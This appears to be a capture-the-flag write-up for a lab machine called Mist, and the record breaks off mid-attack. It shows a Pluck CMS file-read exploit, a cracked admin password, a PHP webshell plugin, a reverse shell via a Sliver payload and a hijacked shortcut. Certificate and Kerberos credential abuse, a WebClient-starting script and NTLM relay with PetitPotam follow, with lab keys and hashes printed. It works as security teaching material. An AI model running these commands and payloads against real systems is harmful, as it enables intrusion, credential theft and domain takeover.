Mist

Reconnaissance

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-title: Mist - Mist
|_Requested resource was http://10.129.231.20/?file=mist
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/

The nmap scan already identified the application running on port 80 as Pluck CMS version 4.7.18 and that there are two entries in the robots.txt file.

HTTP

The webpage shows only a quote by Henry David Thoreau and a link to /login.php, that just takes a password but none of the default ones is accepted.

From the robots.txt I know that there is probably /data/ but that just redirects to the default page and even though /docs/ has the directory listing enabled, there are just irrelevant information.

Initial Access

Version 4.7.18 is pretty dated (over a year old at the the time of writing) but it’s also the lastest version¹. Searching for known exploits for this exact version only finds references to an authenticated remote code execution through the upload of a malicious plugin. Another result for the minor version 4.7 is a directory traversal within the albums_getimage.php code. Unfortunately the provided PoC does not work and just returns hacking attempt has been detected.

Since Pluck is available on Github, I can have a look at the source code there and check what exactly is preventing the exploitation. The latest commit includes a check for several special characters and if I were to bypass the filter, it would try to load the file from ../../settings/modules/albums/.

<?php
/*
 * This file is part of pluck, the easy content management system
 * Copyright (c) pluck team
 * http://www.pluck-cms.org
 
 * Pluck is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 
 * See docs/COPYING for the complete license.
*/
//Run security
foreach ($_GET as $get_value) {
	if (is_array($get_value) || preg_match('/\.\.|[\\\\:<>&="?*]/', $get_value))
		die ('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
}
unset($get_value);
 
//Define variable
$image = $_GET['image'];
 
//Then, check for hacking attempts (Remote Code Execution), and block them.
if (strpos($image, 'thumb') === false) {
	if (preg_match('#([.*])([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
		if ($image != $matches[0]) {
			unset($image);
			die('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
		}
	}
}
 
elseif (strpos($image, 'thumb') !== false) {
	if (preg_match('#([.*])([/])thumb([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
		if ($image != $matches[0]) {
			unset($image);
			die('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
		}
	}
}
 
//...if no hacking attempts found:
//Check if file exists.
if (file_exists('../../settings/modules/albums/'.$image)) {
	//Generate the image, make sure it doesn't end up in the visitors buffer.
	header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
	header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
	header('Pragma: no-cache');
	header('Content-Type: image/jpeg');
	echo readfile('../../settings/modules/albums/'.$image);
}
 
//If image doesn't exist, send 404 header.
else
	header('HTTP/1.0 404 Not Found');
?>

The PoC located the albums_getimage.php file in /data/modules/albums so the images are loaded from /data/settings/modules/albums/ on the webserver. As already seen with other folders, directory listing is enabled there as well with one file sounding really interesting: admin_backup.php.

Directly accessing the file does not work because the server interprets the PHP code, but using the previously found LFI lets me download the contents.

curl "http://10.129.231.20/data/modules/albums/albums_getimage.php?image=admin_backup.php"
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146

This does look like a backup of the hash that is used to login. The source code identifies the hash as SHA512 and john finds the cleartext password lexypoo97 after a few seconds.

john --format=Raw-SHA512 --fork=10 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
lexypoo97        (?)
--- SNIP ---

Trying the password does work for the login and I’m able to access the admin dashboard of Pluck.

Execution

After getting access to the admin area, I can proceed to use the previously found RCE to get a reverse shell on the target. The script on exploit-db wants the path to a ZIP file to upload, but does not really explain how that should be created. The official example on how to create plugins, is not a big help either. Eventually one can find the Github repository from the exploit creator that has a sample ZIP.

Basically the ZIP file contains just a single PHP file with the code and I can upload by my plugin by going to options ⇒ manage modules ⇒ Install a module….

First I create a simple PHP script that takes everything from the parameter ryuki and passes it to system.

ryuki.php

<?php
 
if(isset($_REQUEST['ryuki'])){
        $cmd = ($_REQUEST['ryuki']);
        system($cmd);
        die;
}
 
?>

Next I’ll compress that file to ryuki.zip before uploading it as a new module. The message after the upload indicates success and I should be able to access the script at /data/modules/<ZIP NAME>/<FILENAME>. Supplying whoami as paramter ryuki returns the current user: svc_web.

curl 'http://10.129.231.20/data/modules/ryuki/ryuki.php?ryuki=whoami'
ms01\svc_web

I use the simple webshell to upload a Sliver payload and use that to get a reverse shell. The uploaded modules get deleted within a set intervall, so I place the PHP script and the sliver binary into C:\xampp\htdocs to achieve persistence.

Privilege Escalation

Looking around on the host MS01 I can see that it corresponds to the IP 192.168.100.101, so there’s at least one other system in play - the Domain Controller DC01 for the mist.htb domain at 192.168.100.100.

Shell as brandon.keywarp

Besides the svc_web user there are two other users configured on the system: Brandon.Keywarp and Sharon.Mullard. After some basic enumeration I find the directory Common Applications right in the root of the C: disk. It does house three lnk files to common applications as the name of the folder suggests and all Users have write access there.

icacls "C:\Common Applications"
C:\Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                       MS01\Administrator:(OI)(CI)(F)
                       BUILTIN\Administrators:(OI)(CI)(F)
                       BUILTIN\Users:(OI)(CI)(RX,W)
 
Successfully processed 1 files; Failed processing 0 files

I decide to replace one of those LNK files with my own, calling the sliver payload. A few minutes pass and there’s a new session as brandon.keywarp.

$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Common Applications\Notepad.lnk")
$Shortcut.TargetPath = "C:\xampp\htdocs\m.exe"
$Shortcut.Save()

Shell as Administrator (MS01$)

In order to escalate my privileges on MS01$, I plan to coerce an authentication to my host via WebDAV and relay this to the Domain Controller to setup Shadow Credentials on the MS01$ machine account.
This requires me to do three things:

• Open a route towards the Domain Controller at 192.168.100.100 and open a local port to forward the authentication back to my host
• Obtain credentials for an account to run PetitPotam from my host
• Enable the WebDAV client on MS01$

With the chisel extension in sliver I open a SOCKS proxy and forward the local port 8080 on the target to my host on port 9999. This solves the first problem.

Through certify I’ll check the available certificates first and find the User template, where Brandon.keywarp is able to enroll. Requesting a new certificate returns the private and public key as well as instructions to convert them to pfx.

sliver (mist) > certify find
 
[*] certify output:
 
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0
 
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'
 
[*] Listing info about the Enterprise CA 'mist-DC01-CA'
 
    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544
 
      Access Rights                                     Principal
 
      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None
 
[*] Available Certificates Templates :
 
    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
--- SNIP ---
 
sliver (mist) > certify request /ca:DC01.mist.htb\\mist-DC01-CA /template:User
 
[*] certify output:
 
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0
 
[*] Action: Request a Certificates
 
[*] Current user context    : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.
 
[*] Template                : User
[*] Subject                 : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
 
[*] Certificate Authority   : DC01.mist.htb\mist-DC01-CA
 
[*] CA Response             : The certificate had been issued.
[*] Request ID              : 60
 
[*] cert.pem         :
 
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAz0s1oGgy/c4H7mBASm+8q90twnBz1ahVI46n0Tz16DSAgelL
au2totarrExMzDAqmrirzES4p2KZb9GnHBzrpaOJhF3fPoVLrTXolfXty4Ph1drU
X2G8DxLUgVdQs0SImb28U9pu1Y6DPGIAcVv1AzICrtCFshxQrpvX/biNUTKrtmOb
gbhFnEguq7Osw8ZUfnju9aRLS1vk0hvvhx+vHNZZRqLWfFva7RBvF8+7aKRUEAtU
0fkV6jgZ4KdzLcgwSNzJSFH1hVQpRlRl7FHfphEDvW8/IEfqEBqzAi7q9rJW0h7t
3k3U9/UHjGTni9F6ZG1m12CTjSxLZ74eaLeP/QIDAQABAoIBADYSUTe5Vmu7/Xeh
pcOE5/sQo6oPeTenRCYVRRMgSqi6YTcB6slGnD9Yrckw0euFOOfI+g87ccs/vfRc
BLIhnRpE0U80yVHepUHWSQgs8U1f5l3JShJjRRHNgJ8IbqWEX/lyc5iP5s9P8E2k
5qarLPsbZXXCMM2n8yfIwQuOw1YFYHCQT+YpgFhnVCd55fTVqsDxhRB4ykNbKDTo
ecidW+AIXqW03KVT8wBqJ9C90Oqgwfrhxd56B4nQLOk9aeIeMf+GPOG5S86BHsCl
vyvb5O0SIGDizW+8MXYInJ/YFCaraoj2eDMHdiO+UgAWSSx/5w+1yOKShXv4Lzzn
1Q/CT8UCgYEA6lNih0G5f+TRUhD0moMC1RXzCydBU4GCOwllk1vZWu6CZs3fBzkW
RrbcXF2IGco8HeuZ7CFkYdLmKBIP3kUO/W0T0VlGgbh/u+k0rohSWnNPAlGoLNTv
AWkB0oPspkqsaKtG3TMhctNjPChPOqW/rdjhrnGawUjY4+YTnhmioBsCgYEA4ne7
yD56CkJg6jCaD65m/Mk2oFfj973J+c9pNnXVdDEju2RccijU7ld1+a0Am/8XaVkG
QCX49jlCD2BuHRmZ4kgRFSpyzYTnwZo3CQ5TCjU+MAnWZrN9biNBRR6KztJGsddX
RsgFRAotKlebKO0P0FrGKMusJzLTJ3TceUbXAccCgYEA5w7IFhVCBBGuMd0URROw
hEt7d+ECcoQ+1VYDuhWUsyyCmzqflDC/fYUsr0tvO/cF5n7+LTAUGr3qQ1LkIMk5
6b1YEFOWya0TD0j6sKstgZE4NFIuod5pups/t8RsYuE5NpDFdLLJZb95l8Ursunj
o1o711agQb1CWR7y8y/WA0cCgYEA4kjZLUCgGNgylk5x4fFVnog/OQAZHVZaFm6U
poIfAraHCZtCdB8wg+aITy36SeUds3nssPRAS2bzBwJHhHQsOtnfl9KOW6TNHbnF
/BqABtckiEOMI5p9XiuD8FiQQhAB63lMD8GU4WN5tbFLrB0TjBDnp6O7JH+4VNiD
4/pQo8kCgYEA2l08crE2/UNm8+6YXQuGw0K/PwWrWkVzt4DeejDtSmEpQgFJSrlg
U/pXyWc6X6WAIkZK5NpJu9e7W2ShAIorNCm/qGkcFpyRFqa0Jc37eyzCvr19WRRJ
1+40IGsSSgSBm8qF7RY1w8j92w2f097zorflGrZtwdxvW2pq+WYqRJI=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAADwN19Cb1mtIBgAAAAAAPDANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI0MTAwOTEzMTY1OVoXDTI1MTAwOTEz
MTY1OVowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPSzWgaDL9zgfuYEBKb7yr3S3C
cHPVqFUjjqfRPPXoNICB6Utq7a2i1qusTEzMMCqauKvMRLinYplv0accHOulo4mE
Xd8+hUutNeiV9e3Lg+HV2tRfYbwPEtSBV1CzRIiZvbxT2m7VjoM8YgBxW/UDMgKu
0IWyHFCum9f9uI1RMqu2Y5uBuEWcSC6rs6zDxlR+eO71pEtLW+TSG++HH68c1llG
otZ8W9rtEG8Xz7topFQQC1TR+RXqOBngp3MtyDBI3MlIUfWFVClGVGXsUd+mEQO9
bz8gR+oQGrMCLur2slbSHu3eTdT39QeMZOeL0XpkbWbXYJONLEtnvh5ot4/9AgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFGYDmb15iTUP2rIV8N27BrMH
Wk8mMB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEA56iMUigSskodV2bvkT5Q2k4InLBugxWx/YLAWOKP7NnJ9GT/eHKqwvSfeZ6d
ofo5ZM6wiLSuqvIK5lCRTYTrBY020imh8HwNcM87YbpTmNvSOzey1gpjpYvbReJM
0bPgvW54Nx6yxhXsF3KAggoV3dogr/SJR3Orm/GZKRQfsjPgP8TxD8FccTmpwCXb
S5giSV/VYFnty9zHg3VDVLvEnP42iuRby9FmI396/zhI+1WGgMHAJ4WfW3cAoHcM
Qtm1LTQOYSaq8jfGjzuscSCBGE8s0tUVCBJNc29h/JewdG1wJBWIC1uB6p6ZYMKQ
2Qe0BtRp+Oy/tieOjoZaBIdoeg==
-----END CERTIFICATE-----
 
 
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 
 
 
Certify completed in 00:00:14.4091341

I’ll convert the base64 certificate to pfx (without providing a password) and upload the file to C:\temp\cert.pfx to be used with Rubeus to retrieve a new TGT and to also get the NTLM hash for the user. The command returns DB03D6A77A2205BC1D07082740626CC9 and resolves the second problem.

sliver (mist) > upload cert.pfx
 
[*] Wrote file to C:\temp\cert.pfx
 
sliver (mist) > rubeus asktgt /getcredentials /nowrap /show /domain:mist.htb /dc:DC01.mist.htb /user:brandon.keywarp /certificate:C:\\temp\\cert.pfx
 
[*] rubeus output:
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.3.2
 
[*] Action: Ask TGT
 
[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\brandon.keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 
      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
 
  ServiceName              :  krbtgt/mist.htb
  ServiceRealm             :  MIST.HTB
  UserName                 :  brandon.keywarp (NT_PRINCIPAL)
  UserRealm                :  MIST.HTB
  StartTime                :  10/9/2024 6:31:01 AM
  EndTime                  :  10/9/2024 4:31:01 PM
  RenewTill                :  10/16/2024 6:31:01 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  V4AN6zyZweYh+XAdWwA/jw==
  ASREP (key)              :  E398D3840C555B6DC57DFDDDC32D07FF
 
[*] Getting credentials using U2U
 
  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : DB03D6A77A2205BC1D07082740626CC9

Now I just need to enable WebDAV on the server. There are several methods to accomplish that, either by mapping a network share or using a searchConnector-ms file (this requires someone to view the folder)².

Hint

It’s also possible to use c2tc-startwebclient from the sliver armory

Trying to start the service via sc.exe fails due to the missing permissions, but this service also has custom ETW trigger defined and therefore can be enabled through that³. There’s also a PoC that uses C# embedded in a Powershell script to call the trigger via its GUID 22b6d684-fa63-4578-87c9-effcbe6643c7 (found by sc.exe qtriggerinfo WebClient).

Enable-WebDavClient.ps1

$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient{
public static class Starter{
[StructLayout(LayoutKind.Explicit, Size=16)]
public class EVENT_DESCRIPTOR{
[FieldOffset(0)]ushort Id = 1;
[FieldOffset(2)]byte Version = 0;
[FieldOffset(3)]byte Channel = 0;
[FieldOffset(4)]byte Level = 4;
[FieldOffset(5)]byte Opcode = 0;
[FieldOffset(6)]ushort Task = 0;
[FieldOffset(8)]long Keyword = 0;
}
 
[StructLayout(LayoutKind.Explicit, Size = 16)]
public struct EventData{
[FieldOffset(0)]
internal UInt64 DataPointer;
[FieldOffset(8)]
internal uint Size;
[FieldOffset(12)]
internal int Reserved;
}
 
public static void startService(){
Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);
 
long handle = 0;
uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);
 
bool success = false;
 
if (output == 0){
EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
unsafe
{
uint writeOutput = EventWrite(handle, ref desc, 0, null);
success = writeOutput == 0;
EventUnregister(handle);
}
}
}
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData* UserData);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventUnregister(long RegHandle);
}
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()

After running the Powershell script the WebDAV client is up and running (for a few minutes), so before doing this I’ll setup ntlmrelayx from impacket on my machine to catch the authentication and relay it through the SOCKS proxy to the Domain Controller.

Info

The current version from impacket (0.12.0) does not allow the removal of the shadow credentials but there is a pull request that adds this feature. This is necessary because there are already shadow credentials set for MS01$ as seen with pywhisker.

proxychains -q \
            python3 pywhisker.py \
            --user brandon.keywarp \
            --hashes :DB03D6A77A2205BC1D07082740626CC9 \
            --domain mist \
            --target 'MS01$' \
            --action "list" \
            --dc-ip 192.168.100.100
[*] Searching for the target account
[*] Target user found: CN=MS01,CN=Computers,DC=mist,DC=htb
[*] Listing devices for MS01$
[*] DeviceID: 8cd97a3f-1874-4050-8154-cacac1a12514 | Creation Time (UTC): 2024-10-09 14:01:02.550468

I start with cloning the repository and create a new virtual environment to install the needed requirements and the library itself. Then I can start ntlmrelayx in interactive mode, listening on port 9999 for incoming requests and relaying them via ldaps.

git clone --single-branch \
          --branch interactive-ldap-shadow-creds \
          https://github.com/Tw1sm/impacket/
 
cd impacket
 
python3 -m venv venv && source venv/bin/activate
 
pip install -r requirements.txt
pip install PyOpenSSL==24.0.0 setuptools
pip install .
 
# Starting ntlmrelayx
proxychains -q python3 examples/ntlmrelayx.py -t ldaps://192.168.100.100 --http-port 9999 --interactive
Impacket v0.10.1.dev1+20220912.224808.5fcd5e81 - Copyright 2022 SecureAuth Corporation
 
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 9999
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

Then I use the Python version of PetitPotam with the credentials of brandon.keywarp to coerce MS01$ to authenticate to itself on port 8080 and therefore going through the port forwarding to my listener.

proxychains python3 PetitPotam.py \
                    -target-ip 192.168.100.101 \
                    -dc-ip 192.168.100.100 \
                    --username Brandon.Keywarp \
                    -hashes :DB03D6A77A2205BC1D07082740626CC9 \
                    --domain MIST \
                    localhost@8080/asd \
                    192.168.100.101
 
                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
 
 
 
Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.100.101[\PIPE\lsarpc]
